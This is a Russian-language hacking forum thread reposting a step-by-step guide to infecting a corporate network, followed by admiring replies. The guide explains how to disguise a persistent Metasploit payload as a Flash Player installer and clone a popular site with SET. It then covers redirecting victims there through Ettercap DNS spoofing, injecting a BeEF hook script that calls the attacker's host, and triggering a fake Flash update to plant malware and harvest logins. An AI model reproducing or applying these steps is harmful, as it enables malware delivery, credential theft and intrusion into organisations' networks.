Тотальное заражение корпоративной сети!

Понял ли ты что здесь написанно??? XD

  • Да!

  • Нет!!!

  • Почти)))


Результаты будут видны только после голосования.

Aceki

ОПЫТНЫЙ USER
Регистрация
14 Июн 2021
Сообщения
963
Реакции
189
Статья не моя, я её взял из открытых источников, но я думаю вам будет интересно её почитать.
Надеюсь вы научитесь чему-то новому)))

--------------------------------------------------------------------------------------------------------------------------------
Здравствуйте, на сей раз хочу поделится с вами личным (свинским) методом заражения (корпоративной сети)
Вынашивал сей метод долго... продумывал каждый шаг и поэтому статья не будет короткой как обычно.
Из неё Мы вспомним старые, добрые инструменты такие как Beef-xss framework, Ettercap, SET,shellter ну и классика MSF или не раз мной и здесь упомянутый другими обитателями этого замечательного борда EMPIRE.
Возможно прочитав её Вы почерпнете для себя что то новое, а именно не знакомые функции в старых добрых инструментов.
Важным плюсом моей методики является то что Вам не придется что-то впаривать жертве подсовывать и т.д. при хорошем раскладе она сама все сделает!)))

Предположим что Вы инсайдер или прорвали первую линию обороны взломав вражескую беспроводную сеть и Вас мучают вопросы как быть дальше, ответы есть и не только в этой статье, а например такие как eternalblue и т.д. но что делать если чужие машины уже про патчены и експлойты их не пробивают!? Ответ прост, читаем дальше..

Итак начнем с создания и маскировки нашего малваря, а именно это будет флэш-плеер от всем известной компании сами знаете какой. Показывать я буду на примере MSF а то Вы наверняка уже думаете " че он пристал к этому EMPIRE как лишай да пионерки"

вот скрины его создания с дополнительной функцией persistence
jnKt70c2I5A.jpg

kjC_yyrrMEA.jpg


Далее смешиваем его с flashplayer -ом в shellter

qnW-afqSU_A.jpg


5qSJ7tHzVpU.jpg


в итоге получаем зараженный FlashPlayer, на вирусы сканил, на момент написания статьи он чист!

Далее подымаем сервис apache и заводим утилиту SET с её помощью клонируем популярный сайт соц. сети или-же сайт который пользуется спросом в корпоративной (вражеской) сети! На этом моменте заострять внимание я думаю не стоит инфы полно везде.. попутно телепортируем наш зараженный FlashPlayer в паку сервиса apache.

Настройка сети под себя:

Идем в папку: cd /etc/ettercap/ там лежат файлы конфигурированния (настройки) этой утилиты, а именно нас интересует два файла etter.conf и etter.dns открываем в nano | leafpad файл etter.conf

lOO_qmwlMkw.jpg

ставим значение "0"

Pf4Mo068kFU.jpg


сохраняем и закрываем его.
Открываем второй файл etter.dns

DH9j08pC8Rc.jpg


3-ю строчку можно удалить, сохраняем и закрываем.
Запускаем: ettercap -G

OEs1npEqln8.jpg


Запусти его по позже !!! У нас остался еще один важный инструмент BEEF-XSS . Итак поясняю что мы сделали, как только жертвы будут заходить с сети на наш фэйк-сайт который мы прописали в настройках они будут автоматом попадать к нам!))) Следовательно мы не только заразим машину но еще бонусом получим логин пароль от аккаунтов!)) Лично меня такая аттака устраивает на все 100! Едем дальше...

K08qAnOKO7I.jpg


НАСТРОЙКА BEEF:
Идем в папку: cd /usr/share/beef-xss/modules/social_engineering/fake_flash_update
там есть файл config.yaml под строчкой fake_flash_update: вписываем: autorun: true

Cледуещее что нам нужно сделать это вписать строчку в код файла который мы создали в SET-e и находится он в сервисе апач /var/www/html/ вот эта строчка <script src="http://ВашIP:3000/hook.js"></script> Запускаем BEEF он выдаст инфу как попасть в панель управления>
http://127.0.0.1:3000/ui/panel логин: "beef" пароль такой же!
Там находим соц.инж / fake flash update настраиваем под себя текст, время появления окна о том что "вы не можете попасть на страницу т.к. ваш ФП устарел" и прописываем путь до Вашего ФП чтобы жертва могла его скачать опять же у нас!))

Запуск:

7q9093s1ci0.jpg


Запуск производим в таком порядке:
apache2>SET>Ettercap>BEEF>MSF>

ждем сессий в метасплойте/империи и логинов паролей в СЭТ-е!
 
Всё отлично, но мемы лишние
 
Ахахах, вшиться в флешплеер и установить сессию, да это же гениально!!! чёрт возьми.
 
@HiToMe, не, самое то. Все же приятно смотреть не на тупо белый текст на темном фоне.
 
Назад
Сверху